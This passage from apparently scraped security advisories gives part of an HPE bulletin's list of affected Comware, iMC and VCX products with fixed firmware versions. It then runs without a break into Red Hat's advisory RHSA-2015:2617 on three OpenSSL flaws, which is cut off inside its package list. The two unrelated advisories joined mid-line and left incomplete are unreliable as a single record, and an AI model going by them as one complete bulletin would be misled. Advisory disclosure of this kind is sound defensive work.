- JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots
- JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface
- JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots
- JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots
- JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
- JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
- 4800G (Comware 5) - Version: R2221P22
- HP Network Products
- JD007A HP 4800-24G Switch
- JD008A HP 4800-24G-PoE Switch
- JD009A HP 4800-24G-SFP Switch
- JD010A HP 4800-48G Switch
- JD011A HP 4800-48G-PoE Switch
- 5500SI (Comware 5) - Version: R2221P22
- HP Network Products
- JD369A HP 5500-24G SI Switch
- JD370A HP 5500-48G SI Switch
- JD371A HP 5500-24G-PoE SI Switch
- JD372A HP 5500-48G-PoE SI Switch
- JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots
- JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots
- 4500G (Comware 5) - Version: R2221P22
- HP Network Products
- JF428A HP 4510-48G Switch
- JF847A HP 4510-24G Switch
- 5120 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JE066A HP 5120-24G EI Switch
- JE067A HP 5120-48G EI Switch
- JE068A HP 5120-24G EI Switch with 2 Interface Slots
- JE069A HP 5120-48G EI Switch with 2 Interface Slots
- JE070A HP 5120-24G-PoE EI 2-slot Switch
- JE071A HP 5120-48G-PoE EI 2-slot Switch
- JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots
- JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots
- JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots
- JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots
- JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots
- JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots
- 4210G (Comware 5) - Version: R2221P22
- HP Network Products
- JF844A HP 4210-24G Switch
- JF845A HP 4210-48G Switch
- JF846A HP 4210-24G-PoE Switch
- 5120 SI (Comware 5) - Version: R1517
- HP Network Products
- JE072A HP 5120-48G SI Switch
- JE072B HPE 5120 48G SI Switch
- JE073A HP 5120-16G SI Switch
- JE073B HPE 5120 16G SI Switch
- JE074A HP 5120-24G SI Switch
- JE074B HPE 5120 24G SI Switch
- JG091A HP 5120-24G-PoE+ (370W) SI Switch
- JG091B HPE 5120 24G PoE+ (370W) SI Switch
- JG092A HP 5120-24G-PoE+ (170W) SI Switch
- JG309B HPE 5120 8G PoE+ (180W) SI Switch
- JG310B HPE 5120 8G PoE+ (65W) SI Switch
- 3610 (Comware 5) - Version: R5319P15
- HP Network Products
- JD335A HP 3610-48 Switch
- JD336A HP 3610-24-4G-SFP Switch
- JD337A HP 3610-24-2G-2G-SFP Switch
- JD338A HP 3610-24-SFP Switch
- 3600V2 (Comware 5) - Version: R2111P01
- HP Network Products
- JG299A HP 3600-24 v2 EI Switch
- JG299B HP 3600-24 v2 EI Switch
- JG300A HP 3600-48 v2 EI Switch
- JG300B HP 3600-48 v2 EI Switch
- JG301A HP 3600-24-PoE+ v2 EI Switch
- JG301B HP 3600-24-PoE+ v2 EI Switch
- JG301C HP 3600-24-PoE+ v2 EI Switch
- JG302A HP 3600-48-PoE+ v2 EI Switch
- JG302B HP 3600-48-PoE+ v2 EI Switch
- JG302C HP 3600-48-PoE+ v2 EI Switch
- JG303A HP 3600-24-SFP v2 EI Switch
- JG303B HP 3600-24-SFP v2 EI Switch
- JG304A HP 3600-24 v2 SI Switch
- JG304B HP 3600-24 v2 SI Switch
- JG305A HP 3600-48 v2 SI Switch
- JG305B HP 3600-48 v2 SI Switch
- JG306A HP 3600-24-PoE+ v2 SI Switch
- JG306B HP 3600-24-PoE+ v2 SI Switch
- JG306C HP 3600-24-PoE+ v2 SI Switch
- JG307A HP 3600-48-PoE+ v2 SI Switch
- JG307B HP 3600-48-PoE+ v2 SI Switch
- JG307C HP 3600-48-PoE+ v2 SI Switch
- 3100V2 (Comware 5) - Version: R5213P01
- HP Network Products
- JD313B HPE 3100 24 PoE v2 EI Switch
- JD318B HPE 3100 8 v2 EI Switch
- JD319B HPE 3100 16 v2 EI Switch
- JD320B HPE 3100 24 v2 EI Switch
- JG221A HPE 3100 8 v2 SI Switch
- JG222A HPE 3100 16 v2 SI Switch
- JG223A HPE 3100 24 v2 SI Switch
- HP870 (Comware 5) - Version: R2607P51
- HP Network Products
- JG723A HP 870 Unified Wired-WLAN Appliance
- JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance
- HP850 (Comware 5) - Version: R2607P51
- HP Network Products
- JG722A HP 850 Unified Wired-WLAN Appliance
- JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance
- HP830 (Comware 5) - Version: R3507P51
- HP Network Products
- JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch
- JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch
- JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch
- JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant
- HP6000 (Comware 5) - Version: R2507P44
- HP Network Products
- JG639A HP 10500/7500 20G Unified Wired-WLAN Module
- JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module
- WX5004-EI (Comware 5) - Version: R2507P44
- HP Network Products
- JD447B HP WX5002 Access Controller
- JD448A HP WX5004 Access Controller
- JD448B HP WX5004 Access Controller
- JD469A HP WX5004 Access Controller
- SecBlade FW (Comware 5) - Version: R3181P07
- HP Network Products
- JC635A HP 12500 VPN Firewall Module
- JD245A HP 9500 VPN Firewall Module
- JD249A HP 10500/7500 Advanced VPN Firewall Module
- JD250A HP 6600 Firewall Processing Router Module
- JD251A HP 8800 Firewall Processing Module
- JD255A HP 5820 VPN Firewall Module
- F1000-E (Comware 5) - Version: TBD still fixing
- HP Network Products
- JD272A HP F1000-E VPN Firewall Appliance
- F1000-A-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG214A HP F1000-A-EI VPN Firewall Appliance
- F1000-S-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG213A HP F1000-S-EI VPN Firewall Appliance
- F5000-A (Comware 5) - Version: F3210P26
- HP Network Products
- JD259A HP A5000-A5 VPN Firewall Chassis
- JG215A HP F5000 Firewall Main Processing Unit
- JG216A HP F5000 Firewall Standalone Chassis
- U200S and CS (Comware 5) - Version: F5123P33
- HP Network Products
- JD273A HP U200-S UTM Appliance
- U200A and M (Comware 5) - Version: F5123P33
- HP Network Products
- JD275A HP U200-A UTM Appliance
- F5000-C/S (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG650A HP F5000-C VPN Firewall Appliance
- JG370A HP F5000-S VPN Firewall Appliance
- SecBlade III (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG371A HP 12500 20Gbps VPN Firewall Module
- JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module
- 6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
- 6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HPE FlexNetwork 6608 Router Chassis
- JC178A HPE FlexNetwork 6604 Router Chassis
- JC178B HPE FlexNetwork 6604 Router Chassis
- JC496A HPE FlexNetwork 6616 Router Chassis
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
- 6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC176A HP 6602 Router Chassis
- HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
- HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
- SMB1910 (Comware 5) - Version: R1113
- HP Network Products
- JG540A HP 1910-48 Switch
- JG539A HP 1910-24-PoE+ Switch
- JG538A HP 1910-24 Switch
- JG537A HP 1910-8 -PoE+ Switch
- JG536A HP 1910-8 Switch
- SMB1920 (Comware 5) - Version: R1112
- HP Network Products
- JG928A HP 1920-48G-PoE+ (370W) Switch
- JG927A HP 1920-48G Switch
- JG926A HP 1920-24G-PoE+ (370W) Switch
- JG925A HP 1920-24G-PoE+ (180W) Switch
- JG924A HP 1920-24G Switch
- JG923A HP 1920-16G Switch
- JG922A HP 1920-8G-PoE+ (180W) Switch
- JG921A HP 1920-8G-PoE+ (65W) Switch
- JG920A HP 1920-8G Switch
- V1910 (Comware 5) - Version: R1517P01
- HP Network Products
- JE005A HP 1910-16G Switch
- JE006A HP 1910-24G Switch
- JE007A HP 1910-24G-PoE (365W) Switch
- JE008A HP 1910-24G-PoE(170W) Switch
- JE009A HP 1910-48G Switch
- JG348A HP 1910-8G Switch
- JG349A HP 1910-8G-PoE+ (65W) Switch
- JG350A HP 1910-8G-PoE+ (180W) Switch
- SMB 1620 (Comware 5) - Version: R1110
- HP Network Products
- JG914A HP 1620-48G Switch
- JG913A HP 1620-24G Switch
- JG912A HP 1620-8G Switch
- NJ5000 - Version: R1107
- HP Network Products
- JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- 10500 (Comware 7) - Version: R7180
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- 12900 (Comware 7) - Version: R1150
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- 5900 (Comware 7) - Version: R2432P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- MSR1000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- MSR2000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- MSR3000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- MSR4000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- VSR (Comware 7) - Version: E0322P01
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- 7900 (Comware 7) - Version: R2150
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- 5130 (Comware 7) - Version: R3113P02
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- 6125XLG - Version: R2432P01
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- 6127XLG - Version: R2432P01
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- Moonshot - Version: R2432P01
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- 5700 (Comware 7) - Version: R2432P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- 5930 (Comware 7) - Version: R2432P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- HSR6600 (Comware 7) - Version: R7103P09
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- HSR6800 (Comware 7) - Version: R7103P09
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing
- JH075A HP HSR6800 RSE-X3 Router Main Processing Unit
- 1950 (Comware 7) - Version: R3113P02
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- 7500 (Comware 7) - Version: R7180
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- 5510HI (Comware 7) - Version: R1120
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- 5130HI (Comware 7) - Version: R1120
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
iMC Products
- IMC PLAT - Version: 7.2 E0403P04
- HP Network Products
- JD125A HP IMC Std S/W Platform w/100-node
- JD126A HP IMC Ent S/W Platform w/100-node
- JD808A HP IMC Ent Platform w/100-node License
- JD814A HP A-IMC Enterprise Edition Software DVD Media
- JD815A HP IMC Std Platform w/100-node License
- JD816A HP A-IMC Standard Edition Software DVD Media
- JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
- JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
- JF377A HP IMC Std S/W Platform w/100-node Lic
- JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
- JF378A HP IMC Ent S/W Platform w/200-node Lic
- JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
- JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
- JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
- JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
- JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
- JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
- JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
- IMC iNode - Version: 7.2 E0407
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- iMC UAM_TAM - Version: 7.1 E0406
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- IMC WSM - Version: 7.2 E0502P04
- HP Network Products
- JD456A HP IMC WSM Software Module with 50-Access Point License
- JF414A HP IMC Wireless Service Manager Software Module with 50-Access Point License
- JF414AAE HP IMC Wireless Service Manager Software Module with 50-Access Point E-LTU
- JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager Module Upgrade with 250 Access Point E-LTU
- JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU
- JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg with 250-node E-LTU
VCX Products
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 21 February 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:2617-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2617.html Issue date: 2015-12-14 CVE Names: CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 =====================================================================
- Summary:
Updated openssl packages that fix three security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
A NULL pointer derefernce flaw was found in the way OpenSSL verified signatures using the RSA PSS algorithm. A remote attacked could possibly use this flaw to crash a TLS/SSL client using OpenSSL, or a TLS/SSL server using OpenSSL if it enabled client authentication. (CVE-2015-3194)
A memory leak vulnerability was found in the way OpenSSL parsed PKCS#7 and CMS data. A remote attacker could use this flaw to cause an application that parses PKCS#7 or CMS data from untrusted sources to use an excessive amount of memory and possibly crash. (CVE-2015-3195)
A race condition flaw, leading to a double free, was found in the way OpenSSL handled pre-shared key (PSK) identify hints. A remote attacker could use this flaw to crash a multi-threaded SSL/TLS client using OpenSSL. (CVE-2015-3196)
All openssl users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm
x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm
